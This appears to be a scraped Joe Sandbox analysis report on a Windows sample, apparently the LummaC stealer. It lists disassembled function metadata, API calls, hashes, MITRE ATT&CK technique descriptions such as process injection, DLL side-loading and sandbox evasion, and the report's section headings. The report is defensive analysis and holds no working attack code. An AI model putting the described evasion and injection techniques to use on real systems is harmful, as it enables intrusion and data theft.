Opcode ID: d6b833df3eabf35734ea8fbe1b72c0da4bd9f9b9070a46d2ad50359e314a3bd7
Instruction ID: 28eb285daa382a9161e2b9b2f35719fdda1a369a125a388b0c418c1ff5801e39
Opcode Fuzzy Hash: d6b833df3eabf35734ea8fbe1b72c0da4bd9f9b9070a46d2ad50359e314a3bd7
Instruction Fuzzy Hash: 267182717083908FC7399E28C4903EEBAD2AFD9324F194A2ED9E9873C1DB3858018747

Function 00435C31 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 184COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 00435C3F

Strings

%, xrefs: 00435D13
9, xrefs: 00435D33
<, xrefs: 00435D1B
8, xrefs: 00435D23
5, xrefs: 00435D2B

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: String
String ID: %$5$8$9$<
API String ID: 2568140703-2114583083
Opcode ID: 8b4c388986064e429a83c3ed4a430769f75a94a30a44882467d4e8bfcb38c0dc
Instruction ID: 129bdd31e0ffa021cc1d2541c5a4e532b4f4a2daf0576048555f6edd8f38ff03
Opcode Fuzzy Hash: 8b4c388986064e429a83c3ed4a430769f75a94a30a44882467d4e8bfcb38c0dc
Instruction Fuzzy Hash: 5E71B971A087908FC7358F28C4943EEBAD26BD9324F198A2DD8E9873D1DB785841C786

Function 0043F159 Relevance: 6.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(00000008), ref: 0043F166
SysFreeString.OLEAUT32(?), ref: 0043F18A
SysFreeString.OLEAUT32(?), ref: 0043F193
SysFreeString.OLEAUT32(?), ref: 0043F1A7

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: FreeString$ClearVariant
String ID:
API String ID: 3349467263-0
Opcode ID: 58560392ab47aa2114563f4356d1c8e52c57eeadeae5f7abc4f76f34a86f5ef2
Instruction ID: 5279a49c251f6cef890a6ffb760737a9ccd1b9896b499edf198907c40db6c3dd
Opcode Fuzzy Hash: 58560392ab47aa2114563f4356d1c8e52c57eeadeae5f7abc4f76f34a86f5ef2
Instruction Fuzzy Hash: 71F06279504204DFC610ABA0D88891ABBB9FFC931AF144969F989D7321CB35E842CF12

Function 004384A5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004384F0
GetSystemMetrics.USER32 ref: 004384FF

Strings

, xrefs: 004385D3

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 69ed578ce1acf7b87b7e3154842484afe7b10fd4941e1b907889245d867a2c86
Instruction ID: 9cac62dfbca176997423f0e393eeb876a9d6a0ba46be18ccb869142c9ab307b0
Opcode Fuzzy Hash: 69ed578ce1acf7b87b7e3154842484afe7b10fd4941e1b907889245d867a2c86
Instruction Fuzzy Hash: D25150B4E142189FDB40EFACD985A9DBBF0BF49300F118529E898E7350D734A945CF96

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report A6QFRW2WiY.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\A6QFRW2WiY.exe.log

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
A6QFRW2WiY.exe

Function 024D2149 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Function 00C11330 Relevance: 1.6, APIs: 1, Instructions: 137
COMMON

Function 00C11268 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Function 00C11270 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Function 0040E9C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141
libraryCOMMON

Function 00445D10 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Function 0040CE80 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 165
threadCOMMON

Function 00442CE0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
memoryCOMMON

Function 00444CCE Relevance: 1.6, APIs: 1, Instructions: 71
libraryCOMMON

Function 004457B5 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Function 00442D62 Relevance: 1.5, APIs: 1, Instructions: 44
memoryCOMMON